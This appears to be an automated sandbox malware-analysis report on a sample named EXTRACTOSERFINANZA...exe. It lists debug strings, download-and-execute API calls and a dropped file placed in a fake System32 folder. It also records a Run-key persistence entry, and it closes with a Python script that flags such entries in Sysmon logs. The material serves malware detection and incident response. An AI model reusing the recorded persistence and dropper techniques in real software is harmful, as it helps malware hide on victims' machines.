          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: .pdbAx source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: .pdb% source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb" source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701306786.00000000014A8000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: version.pdbb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdbk source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb= source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb''J source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: psapi.pdb@ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.668152487.00000000030B6000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.720778134.00000000006B4000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBx source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdbp source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb/ source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wUxTheme.pdb8 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: CLBCatQ.pdbc source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDs source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbkw source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: onfiguration.ni.pdb@ source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbbg-6 source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBg[l_ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdbH source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb4 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbE source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb> source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .pdbA source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: EXTRACTOSERFINANZA989543704031499704092798964.exe Static PE information: 0x9BCFD6C0 [Fri Nov 1 15:56:48 2052 UTC]
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00409908
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 1_2_00AB344C push 00000000h; ret 1_2_00AB3450
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00413ED0 push eax; ret 7_2_00413EFE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 15_2_008E344C push 00000000h; ret 15_2_008E3450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 15_2_014E5080 pushad ; retf 15_2_014E5089
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 15_2_066016A9 push es; ret 15_2_066016AC
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 15_2_066016AD push es; ret 15_2_066016B0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 16_2_00FD344C push 00000000h; ret 16_2_00FD3450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 23_2_0032344C push 00000000h; ret 23_2_00323450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 24_2_0053344C push 00000000h; ret 24_2_00533450
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 24_2_01035088 pushad ; retf 24_2_01035089
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 25_2_00413ED0 push eax; ret 25_2_00413EFE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 25_2_0087344C push 00000000h; ret 25_2_00873450
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040D4E5
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe File created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00411700
Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MservicesOrg2
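The Run-key write above (value name MservicesOrg2) together with the file dropped into C:\Users\user\AppData\Roaming\System32\ is the persistence a responder would hunt for across an estate. The Python below is an added example, not part of this report and not Remcos or Joe Sandbox code: it triages Sysmon Event ID 13 (registry value set) records for Run/RunOnce values whose target lives in a user-writable location or sits in a directory named after a Windows system folder outside C:\Windows, as the dropped file here does. The sample events are constructed; in particular the report does not show the value data of MservicesOrg2, so pointing it at the dropped executable is an assumption, and the SIDs and benign entries are invented for illustration.

```python
"""Triage Run/RunOnce autostart writes from Sysmon EID 13 records (constructed samples)."""
import re

# Run / RunOnce value under any hive prefix; group(2) is the value name.
RUN_KEY_RE = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\(run|runonce)\\([^\\]+)$", re.I)

# Locations a standard user cannot write to; anything else is user-controlled.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Folder names that only belong under C:\Windows; anywhere else they are a lure.
SYSTEM_ONLY_DIRS = {"system32", "syswow64"}

# Fixed expansions so the check does not depend on the analysis host's environment
# (os.path.expandvars would use this machine's values, not the victim's).
ENV = {"%windir%": "c:\\windows", "%systemroot%": "c:\\windows",
       "%programfiles%": "c:\\program files",
       "%programfiles(x86)%": "c:\\program files (x86)"}


def exe_path(details: str) -> str:
    """Pull the executable path out of a Run value's command line (quoted or not)."""
    m = re.match(r'\s*"?(.+?\.exe)"?(?:\s|$)', details, re.I)
    return m.group(1) if m else details.strip()


def classify(target_object: str, details: str):
    """Return a finding dict for a suspicious Run-key write, or None if benign/irrelevant."""
    m = RUN_KEY_RE.search(target_object)
    if not m:
        return None                                  # not a Run/RunOnce value
    path = exe_path(details)
    low = path.lower()
    for var, value in ENV.items():
        low = low.replace(var, value)
    reasons = []
    if not low.startswith(TRUSTED_PREFIXES):
        reasons.append("autostart target in a user-writable location")
    parent_dirs = low.split("\\")[:-1]
    if not low.startswith("c:\\windows\\") and SYSTEM_ONLY_DIRS.intersection(parent_dirs):
        reasons.append("directory name imitates a Windows system folder")
    if not reasons:
        return None
    return {"key": m.group(1), "value": m.group(2), "path": path, "reasons": reasons}


def triage(events):
    """Run classify() over EID 13 records; keep event order, drop benign ones."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        finding = classify(ev["TargetObject"], ev["Details"])
        if finding:
            hits.append(finding)
    return hits


SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"   # constructed
SAMPLE_EVENTS = [
    {   # constructed: the report's Run-key write as Sysmon would log it;
        # the value data is ASSUMED to be the dropped file, the report does not show it
        "EventID": 13,
        "TargetObject": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Run\MservicesOrg2" % SID,
        "Details": r'"C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe"',
    },
    {   # constructed benign machine-wide entry using an environment variable
        "EventID": 13,
        "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
        "Details": r"%windir%\system32\SecurityHealthSystray.exe",
    },
    {   # constructed: legitimate per-user software that lives under AppData (known noise)
        "EventID": 13,
        "TargetObject": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive" % SID,
        "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
    {   # constructed: a value-set event that is not an autostart key at all
        "EventID": 13,
        "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler\ImagePath",
        "Details": r"C:\Windows\System32\spoolsv.exe",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["value"], "->", hit["path"], "|", "; ".join(hit["reasons"]))
```

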